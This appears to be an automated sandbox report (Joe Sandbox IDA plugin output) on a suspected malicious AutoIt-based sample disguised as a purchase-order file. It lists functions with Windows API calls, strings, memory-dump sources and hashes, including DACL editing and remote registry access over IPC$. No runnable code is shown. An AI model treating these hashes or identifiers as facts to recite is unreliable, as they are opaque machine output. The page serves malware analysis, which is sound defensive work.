Opcode Fuzzy Hash: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
Instruction Fuzzy Hash: E0415975A01208EFDB11AF65CC88EAF7BB8EF89725F104469F906D72A0D7349D41CB25

Function 004505F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0045076F
_wcscat.LIBCMT ref: 00450787
_wcscat.LIBCMT ref: 00450799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004507AE
SetCurrentDirectoryW.KERNEL32(?), ref: 004507C2
GetFileAttributesW.KERNEL32(?), ref: 004507DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 004507F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00450806

Strings

*.*, xrefs: 00450845

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
Instruction ID: 7bdd4fe60b36691808eedc24269dbd53bee5a982b2c8d40390e9c2bde986c826
Opcode Fuzzy Hash: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
Instruction Fuzzy Hash: 7D818E755043019FCB24EF24C84596FB3E8BB88305F148C2FFC85D7252EA38E9598B9A

Function 0046EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0046EF3B
GetFocus.USER32 ref: 0046EF4B
GetDlgCtrlID.USER32(00000000), ref: 0046EF56
_memset.LIBCMT ref: 0046F081
GetMenuItemInfoW.USER32 ref: 0046F0AC
GetMenuItemCount.USER32(00000000), ref: 0046F0CC
GetMenuItemID.USER32(?,00000000), ref: 0046F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0046F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0046F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0046F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0046F1C8

Strings

0, xrefs: 0046F079

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 29317c9bbadd724918496d85de70a85e49681d28a90312e95a68292b400220de
Instruction ID: fd95b6122f1952d93dd32aac1146559e7f8eb789f171782a5aa65823d75a237c
Opcode Fuzzy Hash: 29317c9bbadd724918496d85de70a85e49681d28a90312e95a68292b400220de
Instruction Fuzzy Hash: 87817974605301AFD710CF15D884AABBBE9FB89358F00492FF99497291E738DD09CB9A

Function 0043A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
Part of subcall function 0043ABBB: HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
Part of subcall function 0043AC56: HeapAlloc.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A8CB
_memset.LIBCMT ref: 0043A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A8FF
GetLengthSid.ADVAPI32(?), ref: 0043A910
GetAce.ADVAPI32(?,00000000,?), ref: 0043A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A969
GetLengthSid.ADVAPI32(?), ref: 0043A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A995
HeapAlloc.KERNEL32(00000000), ref: 0043A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A9BD
CopySid.ADVAPI32(00000000), ref: 0043A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043AA2F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
Instruction ID: a5b523d4b2b3644710638cbaf41432f6dd7c5ae5a535f21993417544a1ff56ad
Opcode Fuzzy Hash: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
Instruction Fuzzy Hash: 4D518EB1900209AFCF00DF91DD44EEEBBB9FF09304F04952AF951A7290DB399A15CB65

Function 0044CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0044CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0044CCC5
__swprintf.LIBCMT ref: 0044CD1E
__swprintf.LIBCMT ref: 0044CD37
_wprintf.LIBCMT ref: 0044CDED
_wprintf.LIBCMT ref: 0044CE0B

Strings

Line %d (File "%s"):, xrefs: 0044CD18, 0044CD31
"%s" (%d) : ==> %s:, xrefs: 0044CE06
"%s" (%d) : ==> %s:%s%s, xrefs: 0044CDE8
^ ERROR, xrefs: 0044CD8F
Error: , xrefs: 0044CDB5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: b0c44815ca18134a442b23991ed0fc429386b9746ac81cb5eef9ed53fb1c3f11
Instruction ID: b87f9b5062a23003fa6b05271adbf52b62758fb0d399078fd318079a70c5a6e2
Opcode Fuzzy Hash: b0c44815ca18134a442b23991ed0fc429386b9746ac81cb5eef9ed53fb1c3f11
Instruction Fuzzy Hash: 2B518471900109BADB14EBA1DD82EEEB778AF04304F50017BF505721A2EB386E55DFA8

Function 0044CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0044CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0044CAB0
__swprintf.LIBCMT ref: 0044CB09
__swprintf.LIBCMT ref: 0044CB22
_wprintf.LIBCMT ref: 0044CBCD
_wprintf.LIBCMT ref: 0044CBEB

Strings

Line %d (File "%s"):, xrefs: 0044CB03, 0044CB1C
^ ERROR , xrefs: 0044CB64
"%s" (%d) : ==> %s:, xrefs: 0044CBE6
"%s" (%d) : ==> %s:%s%s, xrefs: 0044CBC8
Error: , xrefs: 0044CB95

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 762216de5d55f3372a3bd5cd174e2287c2535f968fb2f6ec9abbe759d8498f52
Instruction ID: 0117c1f52f1ff57d1bcb18ef8004b0eea4860d9531de2a50c9a6b6b6bbec22b3
Opcode Fuzzy Hash: 762216de5d55f3372a3bd5cd174e2287c2535f968fb2f6ec9abbe759d8498f52
Instruction Fuzzy Hash: 1D51C371900119AADB14EBE2DD82EEEB778EF04344F50017BB405720A2DB786F59DFA9

Function 004455BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004455D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00445664
GetMenuItemCount.USER32(004C1708), ref: 004456ED
DeleteMenu.USER32(004C1708,00000005,00000000,000000F5,?,?), ref: 0044577D
DeleteMenu.USER32(004C1708,00000004,00000000), ref: 00445785
DeleteMenu.USER32(004C1708,00000006,00000000), ref: 0044578D
DeleteMenu.USER32(004C1708,00000003,00000000), ref: 00445795
GetMenuItemCount.USER32(004C1708), ref: 0044579D
SetMenuItemInfoW.USER32(004C1708,00000004,00000000,00000030), ref: 004457D3
GetCursorPos.USER32(?), ref: 004457DD
SetForegroundWindow.USER32(00000000), ref: 004457E6
TrackPopupMenuEx.USER32(004C1708,00000000,?,00000000,00000000,00000000), ref: 004457F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00445805

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
Instruction ID: 8c316e5e6c6797ab3a2176d1e40451a3ac209fe88f8ea6b3beab8faaca75f620
Opcode Fuzzy Hash: fe47924269ecb829c8cb5bb70370f5f918f2a5a71e0279e36aa44755a4212213
Instruction Fuzzy Hash: EB71E230641A15BBFF209B15DC49FAABF65FF40368F24021BF618AA2D2C7795C10DB99

Function 00AF24FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00AF2543

Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3090
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30A2
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30B4
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30C6
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30D8
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30EA
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF30FC
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF310E
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3120
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3132
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3144
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3156
Part of subcall function 00AF3073: _free.LIBCMT ref: 00AF3168

_free.LIBCMT ref: 00AF2538

Part of subcall function 00AF2096: HeapFree.KERNEL32(00000000,00000000,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?), ref: 00AF20AC
Part of subcall function 00AF2096: GetLastError.KERNEL32(?,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?,?), ref: 00AF20BE

_free.LIBCMT ref: 00AF255A
_free.LIBCMT ref: 00AF256F
_free.LIBCMT ref: 00AF257A
_free.LIBCMT ref: 00AF259C
_free.LIBCMT ref: 00AF25AF
_free.LIBCMT ref: 00AF25BD
_free.LIBCMT ref: 00AF25C8
_free.LIBCMT ref: 00AF2600
_free.LIBCMT ref: 00AF2607
_free.LIBCMT ref: 00AF2624
_free.LIBCMT ref: 00AF263C

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 30b6a39771df7d0d9c6c68c379d0c8698572d6253734c0b102d69cdcd58e7a97
Instruction ID: d407a988795319ada41954d1d6e0c5b346fa8f9d82f2c5e464f1bf2e002dfbcd
Opcode Fuzzy Hash: 30b6a39771df7d0d9c6c68c379d0c8698572d6253734c0b102d69cdcd58e7a97
Instruction Fuzzy Hash: 08311972A003099BEB31ABB8D945BB6B7E9FB00351F144429F65AD7291DE75ED80CB10

Function 0043A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0043A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0043A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0043A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0043A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0043A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0043A2AB

Strings

\IPC$, xrefs: 0043A1F3
SOFTWARE\Classes\, xrefs: 0043A17D
\CLSID, xrefs: 0043A193

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
Instruction ID: 36ac115add83da1bd3147b99ffcafd1a036894dfbf49d0a91a3d47e0976b8548
Opcode Fuzzy Hash: 8e89b60b28c57dbbb31bac0aaff507f3a2d39c807fdeec03431fd816579aeec0
Instruction Fuzzy Hash: 70411A71C10229AACF15EBA5DC85DEEB778FF08314F00456AF801B72A0DB789D15CBA4

Function 004467E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004467FD
__swprintf.LIBCMT ref: 0044680A

Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00446834
LoadResource.KERNEL32(?,00000000), ref: 00446840
LockResource.KERNEL32(00000000), ref: 0044684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0044686D
LoadResource.KERNEL32(?,00000000), ref: 0044687F
SizeofResource.KERNEL32(?,00000000), ref: 0044688E
LockResource.KERNEL32(?), ref: 0044689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004468F9

Strings

5K, xrefs: 004467F6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5K
API String ID: 1433390588-2802765362
Opcode ID: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
Instruction ID: d697a1fa8781da38c78068c46b0b6ff43c18bd23b22d0c88ecb10fbe5a78bbdf
Opcode Fuzzy Hash: 6872b4b3d6b3d34319df9a50e78a3afd508431f81b654905c2b9f4d6c5d1579e
Instruction Fuzzy Hash: 3731CA7190221AAFEB10AF61DD55EBFBBA8FF09340F018826F901D2151D738D911D779

Function 004425B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004736F4,00000010,?,Bad directive syntax error,0049DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004425D6
LoadStringW.USER32(00000000,?,004736F4,00000010), ref: 004425DD
_wprintf.LIBCMT ref: 00442610
__swprintf.LIBCMT ref: 00442632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004426A1

Strings

Line %d (File "%s"):, xrefs: 00442647
%s (%d) : ==> %s.: %s %s, xrefs: 0044260B
., xrefs: 00442687
Line %d:, xrefs: 0044262C
Error: , xrefs: 0044266F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 06c835ffc423fd4cd24cf5a6242f0bca31f584911adb7397c99b10d12447e64d
Instruction ID: 6e45d18c7c245d819c2143957a2fa29815b484cd66ec6b662217039c2da16d9e
Opcode Fuzzy Hash: 06c835ffc423fd4cd24cf5a6242f0bca31f584911adb7397c99b10d12447e64d
Instruction Fuzzy Hash: 6F215E3190021ABBCF11AF91DC4AFEE7735BF18308F40046AF505760A2EA79AA15DB68

Function 0044778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00447794

Part of subcall function 0041DC38: timeGetTime.WINMM(?,75A8B400,004758AB), ref: 0041DC3C

Sleep.KERNEL32(0000000A), ref: 004477C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004477E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00447806
SetActiveWindow.USER32 ref: 00447825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00447833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00447852
Sleep.KERNEL32(000000FA), ref: 0044785D
IsWindow.USER32 ref: 00447869
EndDialog.USER32(00000000), ref: 0044787A

Strings

BUTTON, xrefs: 004477F8

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
Instruction ID: 3f3377c3b03e6d66edf864826632aa4226d8703482a69eaeed50c8e58cd4201f
Opcode Fuzzy Hash: fc4ab62694c49ec1099aeb68e51c4f0e646b245e142f7d642acf0be79513975a
Instruction Fuzzy Hash: CF215370605645AFF7016F20EC89F6A3F29FB44349B00483AF905812B2DB6D5C06DB6D

Function 004502EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CoInitialize.OLE32(00000000), ref: 0045034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004503DE
SHGetDesktopFolder.SHELL32(?), ref: 004503F2
CoCreateInstance.OLE32(0048DA8C,00000000,00000001,004B3CF8,?), ref: 0045043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004504AD
CoTaskMemFree.OLE32(?,?), ref: 00450505
_memset.LIBCMT ref: 00450542
SHBrowseForFolderW.SHELL32(?), ref: 0045057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004505A1
CoTaskMemFree.OLE32(00000000), ref: 004505A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004505DF
CoUninitialize.OLE32(00000001,00000000), ref: 004505E1

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
